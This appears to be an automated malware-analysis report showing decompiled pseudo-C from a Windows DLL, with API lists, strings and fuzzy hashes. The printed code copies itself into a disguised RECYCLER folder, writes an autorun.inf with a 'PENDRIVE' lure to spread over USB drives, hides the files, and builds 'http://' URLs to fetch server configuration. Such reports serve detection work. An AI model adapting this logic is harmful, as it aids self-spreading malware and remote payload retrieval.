Download Yara Rule

C-Code - Quality: 42%

			E1000B140(void* __eax, void* __ebx, void* __ecx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				void* _t52;
				WCHAR* _t61;
				void* _t74;
				void* _t80;
				void* _t99;
				intOrPtr _t101;
				intOrPtr _t112;
				void* _t121;
				intOrPtr _t128;
				intOrPtr _t129;

				_t126 = __esi;
				_t128 = _t129;
				_t101 = 6;
				do {
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
					_t130 = _t101;
				} while (_t101 != 0);
				_t1 =  &_v8;
				 *_t1 = _t101;
				_v8 =  *_t1;
				_t99 = __eax;
				E10003C28( &_v8);
				_push(_t128);
				_push(0x1000b2fa);
				 *[fs:eax] = _t129;
				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t130);
				_t52 = E10005690(E1000390C(_v12),  *[fs:eax]);
				_t131 = _t52;
				if(_t52 != 0) {
					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
					_t106 = _v24;
					E10003988( &_v20, _v24, _v12, _t131);
					_t61 = E1000390C(_v20);
					CopyFileW(E1000390C( *((intOrPtr*)(_t99 + 4))), _t61, 0);
					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _v24,  &_v28);
					_push(_v28);
					_push(0x1000b418);
					_push(L"icon=shell32.dll,4");
					_push(0x1000b418);
					_push(L"shellexecute=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _v24,  &_v32);
					_push(_v32);
					_push(0x1000b418);
					_push(L"label=PENDRIVE");
					_push(0x1000b418);
					_push(L"action=Open folder to view files");
					_push(0x1000b418);
					_push(L"shell\\Open=Open");
					_push(0x1000b418);
					_push(L"shell\\Open\\command=");
					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _t106,  &_v36);
					_push(_v36);
					_push(0x1000b418);
					_push(L"shell\\Open\\Default=1");
					E100039EC();
					_t74 = E1000391C(_v16) + _t73;
					_t132 = _t74;
					asm("cdq");
					_push(0x14);
					_push(_t74);
					_push(E1000390C(_v16));
					E10003988( &_v40, L"autorun.inf", _v8, _t74);
					_t80 = E1000390C(_v40);
					_pop(_t121);
					E10005EB4(_t80, _t121);
					E10003988( &_v44, L"autorun.inf", _v8, _t74);
					E10005F1C(_v44, _t99, L"autorun.inf", __esi);
					_t109 = L"RECYCLER\\";
					E10003988( &_v48, L"RECYCLER\\", _v8, _t74);
					E10005F1C(_v48, _t99, L"RECYCLER\\", __esi);
					E10005F1C(_v12, _t99, L"RECYCLER\\", __esi);
					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _t109,  &_v56);
					E10003988( &_v52, _v56, _v12, _t132);
					E10005F1C(_v52, _t99, _v56, _t126);
				}
				_pop(_t112);
				 *[fs:eax] = _t112;
				_push(E1000B301);
				return E10003788( &_v56, 0xd);
			}

0x1000b140
0x1000b141
0x1000b144
0x1000b149
0x1000b149
0x1000b14b
0x1000b14d
0x1000b14d
0x1000b14d
0x1000b150
0x1000b150
0x1000b154
0x1000b157
0x1000b15c
0x1000b163
0x1000b164
0x1000b16c
0x1000b17a
0x1000b187
0x1000b18c
0x1000b18e
0x1000b19c
0x1000b1a1
0x1000b1aa
0x1000b1b2
0x1000b1c1
0x1000b1c6
0x1000b1d1
0x1000b1d6
0x1000b1d9
0x1000b1de
0x1000b1e3
0x1000b1e8
0x1000b1ed
0x1000b1f8
0x1000b1fd
0x1000b200
0x1000b205
0x1000b20a
0x1000b20f
0x1000b214
0x1000b219
0x1000b21e
0x1000b223
0x1000b228
0x1000b233
0x1000b238
0x1000b23b
0x1000b240
0x1000b24d
0x1000b25a
0x1000b25a
0x1000b25c
0x1000b25d
0x1000b25e
0x1000b267
0x1000b273
0x1000b27b
0x1000b280
0x1000b281
0x1000b291
0x1000b299
0x1000b2a1
0x1000b2a9
0x1000b2b1
0x1000b2b9
0x1000b2c4
0x1000b2d2
0x1000b2da
0x1000b2da
0x1000b2e1
0x1000b2e4
0x1000b2e7
0x1000b2f9

APIs

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,1000B2FA,?,?,00000000,00000000), ref: 1000B1C1

Part of subcall function 10005F1C: GetFileAttributesW.KERNEL32(00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?,?,.dat), ref: 10005F46
Part of subcall function 10005F1C: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?), ref: 10005F58

Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B

Strings

shell\Open\Default=1, xrefs: 1000B240
icon=shell32.dll,4, xrefs: 1000B1DE
shell\Open=Open, xrefs: 1000B219
RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B172, 1000B1ED, 1000B228
shell\Open\command=, xrefs: 1000B223
[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\, xrefs: 1000B1C6
shellexecute=, xrefs: 1000B1E8
label=PENDRIVE, xrefs: 1000B205
action=Open folder to view files, xrefs: 1000B20F
RECYCLER\, xrefs: 1000B2A1
autorun.inf, xrefs: 1000B26B, 1000B289

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Attributes$CopyFreeString
String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
API String ID: 1359780422-631342129
Opcode ID: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
Instruction ID: 6ae93d5114324f60805c066673cfebbd25bb18d06d828e6891266f46ee2437b0
Opcode Fuzzy Hash: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
Instruction Fuzzy Hash: 71410E38900909ABEB05EF94CD82DDEB7B9EF44281F90C165F500B725EDB71BE058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 100096F6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 35
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E100096F6() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0x1000977a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0x1000f6cc =  *0x1000f6cc - 1;
				if( *0x1000f6cc < 0) {
					 *0x1000f68c = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0x1000f690 = RegisterClipboardFormatW(L"gsegtsrgrefsfsfsgrsgrt");
					 *0x1000f694 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0x1000f694 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0x1000f69c = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0x1000f6a0 = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E10009781);
				return 0;
			}

0x100096fd
0x100096fe
0x10009703
0x10009706
0x10009709
0x10009710
0x1000971c
0x1000972b
0x1000973a
0x10009749
0x10009758
0x10009767
0x10009767
0x1000976e
0x10009771
0x10009774
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 10009717
RegisterClipboardFormatW.USER32(gsegtsrgrefsfsfsgrsgrt), ref: 10009726
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 10009735
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 10009744
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 10009753
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 10009762

Strings

gsegtsrgrefsfsfsgrsgrt, xrefs: 10009721
jytjyegrsfvfbgfsdf, xrefs: 1000973F
jiejwogfdjieovevodnvfnievn, xrefs: 10009712
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 1000975D
hgtrfsgfrsgfgregtregtr, xrefs: 1000974E
trhgtehgfsgrfgtrwegtre, xrefs: 10009730

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClipboardFormatRegister
String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
API String ID: 1228543026-2672052065
Opcode ID: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
Instruction ID: ed3f77de684bd0d246fe2b552f76a464aac7a3f76a0323551fd1ca8e49655e55
Opcode Fuzzy Hash: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
Instruction Fuzzy Hash: 8BF0F9794192116EF701DF714C6697B7698E7453C13818529F5C882A3DDF3358059BE1

Uniqueness

Uniqueness Score: -1.00%

Function 100096F8, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E100096F8() {
				intOrPtr _t11;
				intOrPtr _t14;

				_push(_t14);
				_push(0x1000977a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t14;
				 *0x1000f6cc =  *0x1000f6cc - 1;
				if( *0x1000f6cc < 0) {
					 *0x1000f68c = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
					 *0x1000f690 = RegisterClipboardFormatW(L"gsegtsrgrefsfsfsgrsgrt");
					 *0x1000f694 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
					 *0x1000f694 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
					 *0x1000f69c = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
					 *0x1000f6a0 = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
				}
				_pop(_t11);
				 *[fs:eax] = _t11;
				_push(E10009781);
				return 0;
			}

0x100096fd
0x100096fe
0x10009703
0x10009706
0x10009709
0x10009710
0x1000971c
0x1000972b
0x1000973a
0x10009749
0x10009758
0x10009767
0x10009767
0x1000976e
0x10009771
0x10009774
0x00000000

APIs

RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 10009717
RegisterClipboardFormatW.USER32(gsegtsrgrefsfsfsgrsgrt), ref: 10009726
RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 10009735
RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 10009744
RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 10009753
RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 10009762

Strings

gsegtsrgrefsfsfsgrsgrt, xrefs: 10009721
jytjyegrsfvfbgfsdf, xrefs: 1000973F
jiejwogfdjieovevodnvfnievn, xrefs: 10009712
frgjbfdkbnfsdjbvofsjfrfre, xrefs: 1000975D
hgtrfsgfrsgfgregtregtr, xrefs: 1000974E
trhgtehgfsgrfgtrwegtre, xrefs: 10009730

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClipboardFormatRegister
String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
API String ID: 1228543026-2672052065
Opcode ID: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
Instruction ID: 4cd3ad10a4a29e5a40757261822789eba1ab52c8d76854998792a07700413263
Opcode Fuzzy Hash: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
Instruction Fuzzy Hash: EDF0F4B94192116EF701DFB18C6A97B7A98E7453C13818529E6C882A3DDF331405ABE2

Uniqueness

Uniqueness Score: -1.00%

Function 10005838, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10005838(WCHAR* __eax, intOrPtr* __edx) {
				short _t7;
				short _t8;
				WCHAR* _t9;
				short _t11;
				WCHAR* _t13;
				short _t16;
				WCHAR* _t17;
				short _t19;
				WCHAR* _t21;
				WCHAR* _t24;
				WCHAR* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t34;
				signed int _t35;
				WCHAR* _t36;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;
				signed int _t40;

				_t38 = __edx;
				_t24 = __eax;
				while(1) {
					L2:
					_t7 =  *_t24;
					if(_t7 != 0 && _t7 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L2:
					_t7 =  *_t24;
					if(_t7 != 0 && _t7 <= 0x20) {
						_t24 = CharNextW(_t24);
					}
					L4:
					if( *_t24 != 0x22 || _t24[1] != 0x22) {
						_t40 = 0;
						_t36 = _t24;
						while(1) {
							_t8 =  *_t24;
							if(_t8 <= 0x20) {
								break;
							}
							if(_t8 != 0x22) {
								_t9 = CharNextW(_t24);
								_t28 = _t9 - _t24;
								_t29 = _t28 >> 1;
								if(_t28 < 0) {
									asm("adc edx, 0x0");
								}
								_t40 = _t40 + _t29;
								_t24 = _t9;
								continue;
							}
							_t24 = CharNextW(_t24);
							while(1) {
								_t11 =  *_t24;
								if(_t11 == 0 || _t11 == 0x22) {
									break;
								}
								_t13 = CharNextW(_t24);
								_t34 = _t13 - _t24;
								_t35 = _t34 >> 1;
								if(_t34 < 0) {
									asm("adc edx, 0x0");
								}
								_t40 = _t40 + _t35;
								_t24 = _t13;
							}
							if( *_t24 != 0) {
								_t24 = CharNextW(_t24);
							}
						}
						E10003BE4(_t38, _t40);
						_t25 = _t36;
						_t37 =  *_t38;
						_t39 = 0;
						while(1) {
							_t16 =  *_t25;
							if(_t16 <= 0x20) {
								break;
							}
							if(_t16 != 0x22) {
								_t17 = CharNextW(_t25);
								if(_t17 <= _t25) {
									continue;
								} else {
									goto L31;
								}
								do {
									L31:
									 *((short*)(_t37 + _t39 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t39 = _t39 + 1;
								} while (_t17 > _t25);
								continue;
							}
							_t25 = CharNextW(_t25);
							while(1) {
								_t19 =  *_t25;
								if(_t19 == 0 || _t19 == 0x22) {
									break;
								}
								_t21 = CharNextW(_t25);
								if(_t21 <= _t25) {
									continue;
								} else {
									goto L25;
								}
								do {
									L25:
									 *((short*)(_t37 + _t39 * 2)) =  *_t25;
									_t25 =  &(_t25[1]);
									_t39 = _t39 + 1;
								} while (_t21 > _t25);
							}
							if( *_t25 != 0) {
								_t25 = CharNextW(_t25);
							}
						}
						return _t25;
					} else {
						_t24 =  &(_t24[2]);
						continue;
					}
				}
			}

0x1000583c
0x1000583e
0x1000584a
0x1000584a
0x1000584a
0x10005850
0x10005848
0x10005848
0x1000584a
0x1000584a
0x10005850
0x10005848
0x10005848
0x10005858
0x1000585c
0x1000586a
0x1000586c
0x100058c8
0x100058c8
0x100058cf
0x00000000
0x00000000
0x10005874
0x100058b4
0x100058bb
0x100058bd
0x100058bf
0x100058c1
0x100058c1
0x100058c4
0x100058c6
0x00000000
0x100058c6
0x1000587c
0x10005895
0x10005895
0x1000589b
0x00000000
0x00000000
0x10005881
0x10005888
0x1000588a
0x1000588c
0x1000588e
0x1000588e
0x10005891
0x10005893
0x10005893
0x100058a7
0x100058af
0x100058af
0x100058a7
0x100058d5
0x100058da
0x100058dc
0x100058de
0x10005942
0x10005942
0x10005949
0x00000000
0x00000000
0x100058e6
0x1000592a
0x10005931
0x00000000
0x00000000
0x00000000
0x00000000
0x10005933
0x10005933
0x10005936
0x1000593a
0x1000593d
0x1000593e
0x00000000
0x10005933
0x100058ee
0x1000590b
0x1000590b
0x10005911
0x00000000
0x00000000
0x100058f3
0x100058fa
0x00000000
0x00000000
0x00000000
0x00000000
0x100058fc
0x100058fc
0x100058ff
0x10005903
0x10005906
0x10005907
0x100058fc
0x1000591d
0x10005925
0x10005925
0x1000591d
0x10005951
0x10005865
0x10005865
0x00000000
0x10005865
0x1000585c

APIs

CharNextW.USER32(00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 10005877
CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 10005881
CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058AA
CharNextW.USER32(00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058B4
CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058E9
CharNextW.USER32(00000000,00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058F3
CharNextW.USER32(00000000,00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 10005920
CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 1000592A

Strings

", xrefs: 1000585E
", xrefs: 10005858

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CharNext
String ID: "$"
API String ID: 3213498283-3758156766
Opcode ID: 56db7724e89b489fdf42acb8acbc4d14fc1821fe57b6b69609cfd9fea17b0585
Instruction ID: 49fe6b66c80159b6a372ae54facb011d0530469a5cfb0b84791d945b4afab074
Opcode Fuzzy Hash: 56db7724e89b489fdf42acb8acbc4d14fc1821fe57b6b69609cfd9fea17b0585
Instruction Fuzzy Hash: EA31E74D70031795FB20FA649CC025B72D5EB452D3BA6C931ED41A728EEDB25C438369

Uniqueness

Uniqueness Score: -1.00%

Function 1000A54F, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127
libraryfileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E1000A54F(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v4;
				void* _v8;
				char _v9;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v2516;
				intOrPtr _v2520;
				char _v4960;
				char _v5040;
				void _v5044;
				char _v5048;
				char _v5052;
				intOrPtr _v5056;
				char _v5060;
				char _v5064;
				char _v5068;
				char _v5072;
				char _v5076;
				char _v5080;
				char _v5084;
				void* _t107;
				void* _t146;
				void* _t151;
				intOrPtr _t161;
				void* _t181;
				void* _t186;
				void* _t210;
				WCHAR* _t230;
				char* _t231;
				intOrPtr _t246;
				intOrPtr _t250;
				char _t251;
				intOrPtr _t254;
				void* _t264;
				char* _t265;
				char _t278;
				void* _t279;
				char* _t280;
				intOrPtr _t293;
				intOrPtr* _t298;
				signed int _t299;
				void* _t300;
				void* _t301;

				_t297 = __esi;
				_t251 = __edx;
				_t102 = __eax;
				_push(__eax);
				asm("insb");
				if(__eflags == 0) {
					_t299 =  *(__esi - 0x73) * 0x8b550040;
					_push(_t299);
					_t300 = _t301;
					_t246 = 0x27b;
					do {
						_push(0);
						_push(0);
						_t246 = _t246 - 1;
					} while (_t246 != 0);
					_t2 =  &_v8;
					 *_t2 = _t246;
					_push(__ebx);
					_push(__esi);
					_t297 = __eax;
					_push( *_t2);
					memcpy( &_v5044, __eax, 0x4e4 << 2);
					_pop(_t250);
					_v12 = _t250;
					_v8 = _t251;
					E10003C28( &_v8);
					_push(_t300);
					_push(0x1000a98b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t301 + 0xc;
					E10003770(_v12);
					LoadLibraryA("URLMON.DLL");
					LoadLibraryA("shell32.dll");
					_t102 =  &_v24;
				}
				E100037D0(_t102, L"XTREME");
				_v9 = 0;
				_t230 = E1000390C(_v4);
				_t107 = E10005CA4(_t230);
				_t307 = _t107;
				if(_t107 == 0) {
					L10:
					_t293 = 0x14;
					_t231 =  &_v4960;
					_t298 =  &_v5040;
					do {
						E100034B0( &_v5048, 0x3d, _t231);
						__eflags = _v5048;
						if(_v5048 != 0) {
							__eflags =  *_t298;
							if( *_t298 > 0) {
								_push("http://");
								E100034B0( &_v5060, 0x3d, _t231);
								_push(_v5060);
								_push(0x1000aa2c);
								E100035A0();
								_t260 = _v5056;
								E100038FC( &_v5052, _v5056);
								_push(_v5052);
								asm("cdq");
								E10005CCC( &_v5064, 0x3d, _v5056,  *_t298, _t260);
								_push(_v5064);
								_push(0x1000aa34);
								E10005CCC( &_v5068, 0x3d, _t260, _v2520, _v2516);
								_push(_v5068);
								_push(L".functions");
								E100039EC();
								E10003898( &_v5072, E1000390C(_v4));
								_push(_v5072);
								E10003898( &_v5076, E1000390C(_v16));
								_pop(_t264);
								_t146 = E10005F88(_v5076, _t231, _t264);
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									DeleteFileW(E1000390C(_v4));
								} else {
									_t151 = E1000390C(_v4);
									_t265 =  &_v24;
									_v32 = E10005E30(_t151, _t265);
									_v28 = _t265;
									__eflags = _v28;
									if(__eflags != 0) {
										if(__eflags > 0) {
											goto L18;
										}
									} else {
										__eflags = _v32;
										if(_v32 > 0) {
											L18:
											E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
											E100050D0(E1000390C(_v16), _v24);
											_t161 = E10003B94(L"STARTSERVERBUFFER", _v16);
											__eflags = _t161;
											if(_t161 > 0) {
												__eflags = E10003B94(L"ENDSERVERBUFFER", _v16);
												if(__eflags > 0) {
													E10003B04( &_v16, 0x11, 1, __eflags);
													E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, __eflags);
													E10006234(_v16, _t231,  &_v5080, _v20, _t298, __eflags);
													E100037AC(_v8, _v5080);
													_push(L"STARTSERVERBUFFER");
													_push( *_v8);
													_push(L"ENDSERVERBUFFER");
													E100039EC();
													E10006234(_v16, _t231,  &_v5084, _v20, _t298, __eflags);
													_t278 = _v5084;
													E100037D0( &_v16, _t278);
													_t181 = E1000391C(_v16);
													asm("cdq");
													_push(_t278);
													_push(_t181 + _t181);
													_push(E1000390C(_v16));
													_t186 = E1000390C(_v4);
													_pop(_t279);
													E10005EB4(_t186, _t279);
													E10005F1C(_v4, _t231,  &_v5084, _t298);
													_v9 = 1;
												}
											}
										}
									}
								}
							}
						}
						_t298 = _t298 + 4;
						_t231 = _t231 + 0x7a;
						_t293 = _t293 - 1;
						__eflags = _t293;
					} while (_t293 != 0);
				} else {
					SetFileAttributesW(_t230, 0x80);
					_t280 =  &_v24;
					_v32 = E10005E30(_t230, _t280);
					_v28 = _t280;
					E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
					E100050D0(E1000390C(_v16), _v24);
					E10006234(_v16, _t230,  &_v5044, _v20, _t297, _t307);
					E100037D0( &_v16, _v5044);
					if(E10003B94(L"STARTSERVERBUFFER", _v16) <= 0) {
						L9:
						DeleteFileW(E1000390C(_v4));
						goto L10;
					} else {
						_t210 = E10003B94(L"ENDSERVERBUFFER", _v16);
						_t309 = _t210;
						if(_t210 <= 0) {
							goto L9;
						} else {
							E10005F1C(_v4, _t230,  &_v5044, _t297);
							E10003B04( &_v16, 0x11, 1, _t309);
							E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, _t309);
							E100037AC(_v8, _v16);
							_v9 = 1;
						}
					}
				}
				_pop(_t254);
				 *[fs:eax] = _t254;
				_push(E1000A992);
				E10003788( &_v5084, 6);
				E100032F0( &_v5060, 2);
				E10003770( &_v5052);
				E100032CC( &_v5048);
				E10003770( &_v5044);
				E10003788( &_v20, 2);
				return E10003770( &_v4);
			}

0x1000a54f
0x1000a54f
0x1000a54f
0x1000a54f
0x1000a550
0x1000a551
0x1000a553
0x1000a558
0x1000a559
0x1000a55c
0x1000a561
0x1000a561
0x1000a563
0x1000a565
0x1000a565
0x1000a568
0x1000a568
0x1000a56b
0x1000a56c
0x1000a56e
0x1000a576
0x1000a57c
0x1000a57e
0x1000a57f
0x1000a582
0x1000a588
0x1000a58f
0x1000a590
0x1000a595
0x1000a598
0x1000a59e
0x1000a5a8
0x1000a5b2
0x1000a5b7
0x1000a5b7
0x1000a5bf
0x1000a5c4
0x1000a5d0
0x1000a5d4
0x1000a5d9
0x1000a5db
0x1000a6bf
0x1000a6bf
0x1000a6c4
0x1000a6ca
0x1000a6d0
0x1000a6dd
0x1000a6e2
0x1000a6e9
0x1000a6ef
0x1000a6f2
0x1000a6f8
0x1000a70a
0x1000a70f
0x1000a715
0x1000a725
0x1000a72a
0x1000a736
0x1000a73b
0x1000a743
0x1000a74c
0x1000a751
0x1000a757
0x1000a76e
0x1000a773
0x1000a779
0x1000a786
0x1000a79b
0x1000a7a6
0x1000a7b7
0x1000a7c2
0x1000a7c3
0x1000a7c8
0x1000a7ca
0x1000a915
0x1000a7d0
0x1000a7d3
0x1000a7d8
0x1000a7e0
0x1000a7e3
0x1000a7e6
0x1000a7ea
0x1000a7f8
0x00000000
0x00000000
0x1000a7ec
0x1000a7ec
0x1000a7f0
0x1000a7fe
0x1000a812
0x1000a825
0x1000a832
0x1000a837
0x1000a839
0x1000a84c
0x1000a84e
0x1000a861
0x1000a87b
0x1000a88c
0x1000a89a
0x1000a89f
0x1000a8a7
0x1000a8a9
0x1000a8b6
0x1000a8c7
0x1000a8cc
0x1000a8d5
0x1000a8dd
0x1000a8e4
0x1000a8e5
0x1000a8e6
0x1000a8ef
0x1000a8f3
0x1000a8f8
0x1000a8f9
0x1000a901
0x1000a906
0x1000a906
0x1000a84e
0x1000a839
0x1000a7f0
0x1000a7ea
0x1000a7ca
0x1000a6f2
0x1000a91a
0x1000a91d
0x1000a920
0x1000a920
0x1000a920
0x1000a5e1
0x1000a5e7
0x1000a5ee
0x1000a5f6
0x1000a5f9
0x1000a610
0x1000a623
0x1000a634
0x1000a642
0x1000a656
0x1000a6b1
0x1000a6ba
0x00000000
0x1000a658
0x1000a660
0x1000a665
0x1000a667
0x00000000
0x1000a669
0x1000a66c
0x1000a67e
0x1000a698
0x1000a6a3
0x1000a6a8
0x1000a6a8
0x1000a667
0x1000a656
0x1000a929
0x1000a92c
0x1000a92f
0x1000a93f
0x1000a94f
0x1000a95a
0x1000a965
0x1000a970
0x1000a97d
0x1000a98a

APIs

LoadLibraryA.KERNEL32(URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5A8
LoadLibraryA.KERNEL32(shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5B2
